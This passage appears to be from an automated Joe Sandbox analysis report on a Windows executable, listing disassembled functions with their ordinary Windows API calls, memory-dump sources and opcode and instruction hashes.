                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                                                  • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                                                                                                                  • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406F10 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                  • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                                                                                                                  • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042364C Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                                                                                                                                                  • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                                                                                                                    • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoParametersSystem$ShowWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3202724764-0
                                                                                                                                                                                                                                  • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                                                                                                                                  • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004242C4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                                                                                                                  • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                                                                                                                                  • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00466B40 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2492992576-0
                                                                                                                                                                                                                                  • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                                                                                                                  • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042CD24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
                                                                                                                                                                                                                                  • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f26b129d564bfe00fcaedc41dfc35f11866fd4db5ee91d95e6c1a36d58de6ea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406EC0 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                                                                                                                                  • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045092C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                                                                                                                    • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 734332943-0
                                                                                                                                                                                                                                  • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                                                                                                                                  • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004072A8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1611563598-0
                                                                                                                                                                                                                                  • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                                                                                                                  • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042E3EF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                                                                                                                  • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004165EC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DestroyWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3375834691-0
                                                                                                                                                                                                                                  • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                                                                                                                  • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00448728 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                                                                                                                  • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F3C4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                                                                                                                  • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452FC4 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
